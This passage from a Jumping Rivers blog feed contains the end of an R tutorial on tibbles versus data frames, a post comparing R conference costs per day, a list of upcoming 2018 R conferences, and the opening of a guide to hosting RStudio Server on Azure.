&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read.csv&lt;/span&gt;(url)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## X.. X8 X. name
## 1 1 2 0.25 t
## 2 2 4 0.25 h
## 3 3 6 0.25 e
## 4 4 8 0.25 o
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Not only does &lt;code&gt;read_csv()&lt;/code&gt; return a pretty tibble, it is also much faster. For proof, check out &lt;a href="http://yetanothermathprogrammingconsultant.blogspot.co.uk/2016/12/reading-csv-files-in-r-readcsv-vs.html" rel="external"&gt;this article&lt;/a&gt; by Erwin Kalvelagen. The keen eyes amongst you will have noticed something odd about the variable names… we’ll get on to that soon.&lt;/p&gt;
&lt;h2 id="tibbles-vs-data-frames"&gt;Tibbles vs Data Frames&lt;/h2&gt;
&lt;p&gt;Did you notice a key difference in the &lt;code&gt;tibble()&lt;/code&gt;s and &lt;code&gt;data.frame()&lt;/code&gt;s above? Take a look again.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(a &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;26&lt;/span&gt;, b &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## # A tibble: 26 x 2
## a b
## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt;
## 1 1 a
## 2 2 b
## 3 3 c
## 4 4 d
## 5 5 e
## # ... with 21 more rows
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The first thing you should notice is the pretty print process. The class of each column is now displayed above it and the dimensions of the tibble are shown at the top. The default print option within tibbles mean they will only display 10 rows if the data frame has more than 20 rows (I’ve changed mine to display 5 rows). Neat. Along side that we now only view columns that will fit on the screen. This is already looking quite the part. The row settings can be changed via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;options&lt;/span&gt;(tibble.print_max &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, tibble.print_min &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So now if there is more than 3 rows, we print only 1 row. Tibbles of length 3 and 4 would now print as so.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## # A tibble: 3 x 1
## `1:3`
## &amp;lt;int&amp;gt;
## 1 1
## 2 2
## 3 3
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## # A tibble: 4 x 1
## `1:4`
## &amp;lt;int&amp;gt;
## 1 1
## # ... with 3 more rows
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Yes, OK, you could do this with the traditional data frame. But it would be a lot more work, &lt;em&gt;right&lt;/em&gt;?&lt;/p&gt;
&lt;p&gt;As well as the fancy printing, tibbles don’t drop the variable type, don’t partial match and they allow non-syntactic column names when importing data in. We’re going to use the data from before. Again, it is available &lt;a href="https://gist.github.com/theoroe3/8bc989b644adc24117bc66f50c292fc8" rel="external"&gt;here&lt;/a&gt;. Notice it has 3 non-syntactic column names and one column of characters. Reading this is as a tibble and a data frame we get&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tib
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## # A tibble: 4 x 4
## `&amp;lt;-` `8` `%` name
## &amp;lt;int&amp;gt; &amp;lt;int&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;chr&amp;gt;
## 1 1 2 0.250 t
## 2 2 4 0.250 h
## 3 3 6 0.250 e
## 4 4 8 0.250 o
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## X.. X8 X. name
## 1 1 2 0.25 t
## 2 2 4 0.25 h
## 3 3 6 0.25 e
## 4 4 8 0.25 o
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;We see already that in the &lt;code&gt;read.csv()&lt;/code&gt; process we’ve lost the column names. Let’s try some partial matching…&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tib&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;n
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## Warning: Unknown or uninitialised column: &amp;#39;n&amp;#39;.
## NULL
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;n
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## [1] t h e o
## Levels: e h o t
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;With the tibble we get an error, yet with the data frame it leads us straight to our &lt;code&gt;name&lt;/code&gt; variable. To read more about why partial matching is bad, check out &lt;a href="http://r.789695.n4.nabble.com/Deprecating-partial-matching-in-data-frame-td4661898.html" rel="external"&gt;this thread&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;What about subsetting? Let’s try it out using the data from our csv file.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tib[,&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## # A tibble: 4 x 1
## `8`
## &amp;lt;int&amp;gt;
## 1 2
## 2 4
## 3 6
## 4 8
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tib[2]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## # A tibble: 4 x 1
## `8`
## &amp;lt;int&amp;gt;
## 1 2
## 2 4
## 3 6
## 4 8
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df[,&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## [1] 2 4 6 8
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df[2]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## X8
## 1 2
## 2 4
## 3 6
## 4 8
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Using the a normal data frame we get a vector and a data frame using single square brackets. Using tibbles, single square brackets, &lt;code&gt;[&lt;/code&gt;, will always return another tibble. Much neater. Now for double brackets.&lt;/p&gt;
&lt;hr&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tib[[1]]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## [1] 1 2 3 4
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tib&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## [1] &amp;#34;t&amp;#34; &amp;#34;h&amp;#34; &amp;#34;e&amp;#34; &amp;#34;o&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df[[1]]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## [1] 1 2 3 4
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## [1] t h e o
## Levels: e h o t
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Double square brackets, &lt;code&gt;[[&lt;/code&gt;, and the traditional dollar, &lt;code&gt;$&lt;/code&gt; are ways to access individual columns as vectors. Now, with tibbles, we have seperate operations for data frame operations and single column operations. Now we don’t have to use that pesky &lt;code&gt;drop = FALSE&lt;/code&gt;. Note, these are actually quicker than the &lt;code&gt;[[&lt;/code&gt; and &lt;code&gt;$&lt;/code&gt; of the &lt;code&gt;data.frame()&lt;/code&gt;, as shown in the &lt;a href="https://cran.r-project.org/web/packages/tibble/tibble.pdf" rel="external"&gt;documentation for the tibble package&lt;/a&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;At last, no more strings as factors! Upon reading the data in, tibbles recognise &lt;em&gt;strings as strings&lt;/em&gt;, not factors. For example, with the name column in our data set.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;class&lt;/span&gt;(df&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## [1] &amp;#34;factor&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;class&lt;/span&gt;(tib&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## [1] &amp;#34;character&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;I quite like this, it’s much easier to turn a vector of characters into factors than vice versa, so why not give me everything as strings? Now I can choose whether or not to convert to factors.&lt;/p&gt;
&lt;h2 id="disadvantages"&gt;Disadvantages&lt;/h2&gt;
&lt;p&gt;This won’t be long, there’s only one. Some older packages don’t work with tibbles because of their alternative subsetting method. They expect &lt;code&gt;tib[, 1]&lt;/code&gt; to return a vector, when infact it will now return another tibble. Until this functionality is added in you must convert your tibble back to a data frame using &lt;code&gt;as_data_frame()&lt;/code&gt; or &lt;code&gt;as_tibble()&lt;/code&gt; as discussed previously. Whilst adding this functionality will give users the chance to use packages with tibbles and normal data frames, it of course puts extra work on the shoulders of package writers, who now have to change every package to be compatible with tibbles. For more on this discussion, see &lt;a href="https://stat.ethz.ch/pipermail/r-package-devel/2017q3/001896.html" rel="external"&gt;this thread&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="to-summarise"&gt;To summarise..&lt;/h2&gt;
&lt;p&gt;So, most of the things you can accomplish with tibbles, you can accomplish with &lt;code&gt;data.frame()&lt;/code&gt;, but it’s bit of a pain. Simple things like checking the dimensions of your data or converting strings to factors are small jobs. Small jobs that take time. With tibbles they take no time. Tibbles force you to look at your data earlier; confront the problems earlier. Ultimately leading to cleaner code.&lt;/p&gt;
&lt;p&gt;Thanks for chatting!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/the-trouble-with-tibbles/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Conference Cost</title><link>https://www.jumpingrivers.com/blog/conference-cost-2017/</link><pubDate>Mon, 18 Dec 2017 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/conference-cost-2017/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/conference-cost-2017/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/conference-cost-2017/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;In last weeks &lt;a href="https://www.jumpingrivers.com/blog/upcoming-r-conferences-2018/"&gt;post&lt;/a&gt; we tantalised you with upcoming R &amp;amp; data science conferences, but from a cost point of view, not all R conferences are the same. Using the R &lt;a href="https://jumpingrivers.github.io/meetingsR/" rel="external"&gt;conference&lt;/a&gt; site, it’s fairly easy to compare the cost of previous R conferences.&lt;/p&gt;
&lt;p&gt;I selected the main conferences over the last few years and obtained the cost for the full ticket (including any tutorial days, but ignoring any discounts). Next, I converted all prices to dollars and calculated the cost per day.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Conference&lt;/th&gt;
&lt;th&gt;Cost($)&lt;/th&gt;
&lt;th&gt;#Days&lt;/th&gt;
&lt;th&gt;$per day&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;eRum 2016&lt;/td&gt;
&lt;td&gt;30&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;satRday 2017&lt;/td&gt;
&lt;td&gt;82&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;27&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;useR! 2017&lt;/td&gt;
&lt;td&gt;770&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;192&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;R Finance 2017&lt;/td&gt;
&lt;td&gt;600&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;300&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;rstudio::conf 2018&lt;/td&gt;
&lt;td&gt;995&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;331&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;New York R&lt;/td&gt;
&lt;td&gt;725&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;362&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Earl London&lt;/td&gt;
&lt;td&gt;1191&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;397&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;The conferences fall into two camps &lt;em&gt;business oriented&lt;/em&gt; and more &lt;em&gt;general&lt;/em&gt; R conferences; useR! is somewhere in the middle. A simple bar plot highlights the extreme difference in cost per day&lt;/p&gt;
&lt;img class="image-center" src="conf-cost-1.svg" style="width:500px; max-width:100%"&gt;
&lt;p&gt;The organisers of &lt;a href="http://erum.ue.poznan.pl/" rel="external"&gt;eRum&lt;/a&gt; and &lt;a href="http://satrdays.org/capetown2017/" rel="external"&gt;SatRdays&lt;/a&gt; should be proud of themselves for keeping the cost down; it would also be really useful if the organisers wrote a blog post giving more general tips for keeping the cost down.&lt;/p&gt;
&lt;p&gt;I’m going to resist commenting on the conferences since I have only ever attended useR! (which is excellent), but in terms of speakers, most conferences have the same keynotes, so this year I’ll be looking at &lt;a href="http://2018.erum.io/" rel="external"&gt;eRum&lt;/a&gt; 2018 (sadly useR! is a bit too far away from me).&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/conference-cost-2017/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Upcoming R conferences (2018)</title><link>https://www.jumpingrivers.com/blog/upcoming-r-conferences-2018/</link><pubDate>Tue, 12 Dec 2017 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/upcoming-r-conferences-2018/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/upcoming-r-conferences-2018/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/upcoming-r-conferences-2018/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;It’s that time of year when we need to start thinking about what R Conferences we would like to (and can!) attend. To help plan your (ahem) work trips, we thought it would be useful to list the upcoming main attractions.&lt;/p&gt;
&lt;p&gt;We maintain a list of &lt;a href="https://jumpingrivers.github.io/meetingsR/" rel="external"&gt;upcoming rstats&lt;/a&gt; conferences. To keep up to date, just follow our &lt;a href="https://twitter.com/rstats_meetings" rel="external"&gt;twitter bot&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="rstudioconf-san-diego-usa"&gt;rstudio::conf (San Diego, USA)&lt;/h4&gt;
&lt;blockquote&gt;
&lt;p&gt;rstudio::conf is about all things R and RStudio&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The next RStudio conference is held in San Diego, and boosts top quality speakers from around the R world. With excellent tutorials and great talks, this is certainly one of the top events. The estimated cost is around $200 per day, so not the cheapest options, but worthwhile.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;January 31, Feb 1-3: &lt;a href="https://www.rstudio.com/conference/" rel="external"&gt;rstudio::conf&lt;/a&gt;. San Diego, USA.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="satrday-cape-town-south-africa"&gt;SatRday (Cape Town, South Africa)&lt;/h4&gt;
&lt;blockquote&gt;
&lt;p&gt;An opportunity to hear from and network with top Researchers, Data Scientists and Developers from the R community in South Africa and beyond.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This workshop combines an amazing location, with great speakers and at an amazing price (only $70 per day). The key note speakers are Maëlle Salmon and Stephanie Kovalchik. This years SatRday has two tutorials, one on package building the other on sports modelling.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;March 17th: &lt;a href="http://capetown2018.satrdays.org/" rel="external"&gt;SatRday&lt;/a&gt;. Cape Town, South Africa.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="erum2018"&gt;Erum2018&lt;/h4&gt;
&lt;p&gt;The European R Users Meeting, eRum, is an international conference that aims at integrating users of the R language living in Europe. This conference is similar to useR!.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;May: &lt;a href="http://2018.erum.io/" rel="external"&gt;The European #rstats Users Meeting&lt;/a&gt;. Budapest, Hungary. &lt;a href="https://twitter.com/erum2018" rel="external"&gt;@erum2018&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="rfinance-2018-chicago-usa"&gt;R/Finance 2018 (Chicago, USA)&lt;/h4&gt;
&lt;p&gt;From the inaugural conference in 2009, the annual R/Finance conference in Chicago has become the primary meeting for academics and practitioners interested in using R in Finance. Participants from academia and industry mingle for two days to exchange ideas about current research, best practices and applications. A single-track program permits continued focus on a series of refereed submissions. We hear there is a lively social program rounds out the event.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;June 1-2: &lt;a href="http://www.rinfinance.com" rel="external"&gt;R/Finance 2018&lt;/a&gt;. Chicago, USA.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="user-2018-brisbane-australia"&gt;useR! 2018 (Brisbane, Australia)&lt;/h4&gt;
&lt;p&gt;With useR! 2017 spanning over 5 days and boasting some of the biggest names in data science, the next instalment of the useR! series is sure to be even better. Last year the program was packed with speakers, programmes and tutorials from industry and academia. Each day usually containing numerous tutorials and usually ends in a keynote speech followed by dinner(!). Registration is open in January 2018.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;July 10-13: &lt;a href="https://user2018.r-project.org/" rel="external"&gt;useR! 2018&lt;/a&gt;. Brisbane, Australia.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="noreastr-conference-north-east-usa"&gt;Noreast’R Conference (North East USA)&lt;/h4&gt;
&lt;p&gt;Born on Twitter, the Noreast’R Conference is a grass roots effort to organize a regional #rstats conference in the Northeastern United States. Work is currently under way and further details will follow on the Noreast’R website and twitter page (linked below).&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://noreastrconf.com/" rel="external"&gt;Noreast’R Conference&lt;/a&gt;. USA. &lt;a href="https://twitter.com/noreastrconf/" rel="external"&gt;@noreastrconf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/upcoming-r-conferences-2018/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Hosting RStudio Server on Azure</title><link>https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/</link><pubDate>Sat, 02 Dec 2017 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/#cant-be-bothered-reading-tell-me-now"&gt;Can’t be bothered reading, tell me now&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/#getting-started"&gt;Getting started&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/#setting-up-r"&gt;Setting up R&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/#opening-ports-ready-for-rstudio"&gt;Opening ports ready for RStudio&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/#installing-rstudio"&gt;Installing RStudio&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/#nicer-urls"&gt;Nicer URLs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/#adding-ssl"&gt;Adding SSL&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="cant-be-bothered-reading-tell-me-now"&gt;Can’t be bothered reading, tell me now&lt;/h2&gt;
&lt;p&gt;Host RStudio server on an azure instance. Configure the instance to access RStudio with a &lt;em&gt;nice&lt;/em&gt; url.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2017-hosting-rstudio-server-on-azure"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="getting-started"&gt;Getting started&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://azure.microsoft.com/" rel="external"&gt;Azure&lt;/a&gt; is cloud computing framework provided by Microsoft, the same idea as AWS by Amazon. In this post, we’ll describe how to use Azure to run &lt;a href="https://www.rstudio.com/products/rstudio/download-server/" rel="external"&gt;RStudio Server&lt;/a&gt; in the cloud.&lt;/p&gt;
